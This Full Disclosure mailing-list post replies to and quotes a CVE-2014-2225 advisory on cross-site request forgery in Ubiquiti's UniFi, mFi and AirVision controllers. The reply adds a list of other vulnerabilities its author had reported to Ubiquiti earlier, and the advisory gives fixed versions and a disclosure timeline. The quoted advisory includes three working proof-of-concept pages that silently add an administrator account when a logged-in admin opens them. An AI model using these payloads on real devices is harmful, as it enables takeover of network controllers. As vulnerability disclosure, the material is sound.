Re: CVE-2014-2225: Ubiquiti Networks - Multiple products - Cross-site Request Forgery (CSRF)

[Luca Carettoni <luca.carettoni () ikkisoft com>]

This is interesting. Ubiquiti knew about this issue since last year.

On 26 Sep 2013, I reported to them the following vulnerabilities
affecting UniFi Controller:

http://www.ikkisoft.com/stuff/UnifiSecurityBugs_Sep2013.pdf

#1 Insecure Java Random() to generate secret tokens
This was fixed in 3.1.5 as "security enhancements". See
http://pastebin.com/Xt0hVCPr for the change log.
java.util.Random was used across the entire codebase to generate
secret tokens, such as session cookies,
AP auth keys and reset tokens. Under some circumstances, it was
practical to predict the reset password
token and compromise the admin account, which would lead to full
compromise of the entire platform.

#2 System-wise Cross Site Request Forgery
In addition to the pdf detailing the vulns, I've shared with them a
PoC with the exact same attack.
After a few emails, trying to explain the criticality of CSRF in this
context, I simply gave up.

#3 Change password does not require old password
#4 Frameable response (ClickJacking)
#5 Credentials are saved in plain-text within MongoDB
#6 Multiple Cross-Site Scripting vulnerabilities (Stored and
Reflected) in /api/, abusing IE content sniffing

As far as I know, these are still open.

In addition, I've asked them to obtain CVEs for those vulnerabilities.
On Oct 30th, they confirmed that they would be disclosed to be public:
"Good point about CVE, we'll request an ID and disclose them later.
Will also address V2."

I don't think that CVEs have ever been assigned to these issues,
neither Ubiquiti has published those details
in a security advisory.

Cheers!
@_ikki


On Wed, Jul 23, 2014 at 8:58 PM, Seth Art <sethsec () gmail com> wrote:
> -----------
> Vendor:
> -----------
> Ubiquiti Networks (http://www.ubnt.com/)
>
> -----------------------------------------
> Affected Products/Versions:
> -----------------------------------------
> UniFi Controller v2.4.6
> mFi Controller v2.0.15
> AirVision Controller v2.1.3
> Note: Previous versions may be affected
>
> -----------------
> Description:
> -----------------
> Title: Cross-site Request Forgery (CSRF)
> CVE: CVE-2014-2225
> CWE: http://cwe.mitre.org/data/definitions/352.html
> Detailed writeup: http://sethsec.blogspot.com/2014/07/cve-2014-2225.html
> Researcher: Seth Art - @sethsec
>
> ---------------
> UniFi POC:
> ---------------
>
> <html>
> <head>
> <script>
> function sendCSRF()
> {
> var url_base = "https://192.168.0.106:8443/api/add/admin";
> var post_data="%7B%22name%22%3A%22csrf%22%2C%22lang%22%3A%22en_US%22%2C%22x_password%22%3A%22csrf%22%7D"
>
> var xmlhttp;
> xmlhttp = new XMLHttpRequest();
> xmlhttp.open("POST", url_base, true);
> xmlhttp.setRequestHeader("Accept","*/*");
> xmlhttp.setRequestHeader("Content-type","application/x-www-form-urlencoded;
> charset=UTF-8");
> xmlhttp.withCredentials= "true";
> xmlhttp.send(post_data);
> }
>
> </script>
> </head>
> <body>
> <h1>CSRF POC</h1>
> Sending CSRF Payload!!!
> <body onload="sendCSRF()">
> </body>
>
> -------------
> mFi POC:
> -------------
> <html>
> <head>
> <script>
> function sendCSRF()
> {
> var url_base = "https://192.168.0.106:6443/api/v1.0/add/admin";
> var post_data="%7B%22name%22%3A%22csrf%22%2C%22lang%22%3A%22en_US%22%2C%22x_password%22%3A%22csrf%22%7D"
>
> var xmlhttp;
> xmlhttp = new XMLHttpRequest();
> xmlhttp.open("POST", url_base, true);
> xmlhttp.setRequestHeader("Accept","*/*");
> xmlhttp.setRequestHeader("Content-type","application/x-www-form-urlencoded;
> charset=UTF-8");
> xmlhttp.withCredentials= "true";
> xmlhttp.send(post_data);
> }
>
> </script>
> </head>
> <body>
> <h1>CSRF POC</h1>
> Sending CSRF Payload!!!
> <body onload="sendCSRF()">
> </body>
>
>
> --------------------
> AirVision POC:
> --------------------
> <html>
> <head>
> <script>
> function sendCSRF()
> {
> var url_base = "https://192.168.0.106:7443/api/v2.0/admin";
> var post_data="{\”name\”:\”csrf\”,\”email\”:\”csrf () gmail 
> com\”,\”userGroup:\”:\”admin\”,\”x_password\”:\”password\”,\”confirmPassword\”:\”password\”,\”disabled\”:\”false\”}”
>
> var xmlhttp;
> xmlhttp = new XMLHttpRequest();
> xmlhttp.open("POST", url_base, true);
> xmlhttp.setRequestHeader("Accept","*/*");
> xmlhttp.setRequestHeader("Content-type","application/plain; charset=UTF-8");
> xmlhttp.withCredentials= "true";
> xmlhttp.send(post_data);
> }
>
> </script>
> </head>
> <body>
> <h1>CSRF POC</h1>
> Sending CSRF Payload!!!
> <body onload="sendCSRF()">
> </body>
>
>
>
> -------------
> Solution:
> -------------
> UniFi Controller - Upgrade to UniFi Controller v3.2.1 or greater
> mFi Controller - Upgrade to mFi Controller v2.0.24 or greater
> AirVision Controller - Upgrade to UniFi Video v3.0.1 or greater (Note:
> The application name changed from AirVision to UniFi Video)
>
> -----------------------------
> Disclosure Timeline:
> -----------------------------
> 2014-02-16: Notified Ubiquiti of vulnerabilities in UniFi and mFi products
> 2014-02-17: Ubiquiti acknowledges and requests details
> 2014-02-17: Report with POC sent to Ubiquiti
> 2014-02-19: Asked Ubiquiti to confirm receipt of report
> 2014-02-19: Ubiquti confirms receipt of report and existence of the
> vulnerabilities
> 2014-02-25: Notified Ubiquiti of CSRF vulnerability in AirVision product
> 2014-02-19: Ubiquti confirms receipt of AirVision report and existence
> of the vulnerability
> 2014-02-28: CVE-2014-2225 assigned
> 2014-03-12: Requested status update
> 2014-03-27: Requested status update
> 2014-04-07: Requested status update, mention that we might need to
> bring in a CERT
> 2014-04-09: Ubiquiti provides timeline for solution
> 2014-04-18: UniFi Video 3.0.1 is released
> 2014-05-30: Requested a status update on the remaining two products
> 2014-06-12: Requested a status update on the remaining two products
> 2014-06-12: mFi v2.0.24 and UniFi 3.2.1 are released
> 2014-06-13: Set public disclosure date of 2014-07-24 and notified vendor
> 2014-07-24: Public disclosure

_______________________________________________
Sent through the Full Disclosure mailing list
http://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/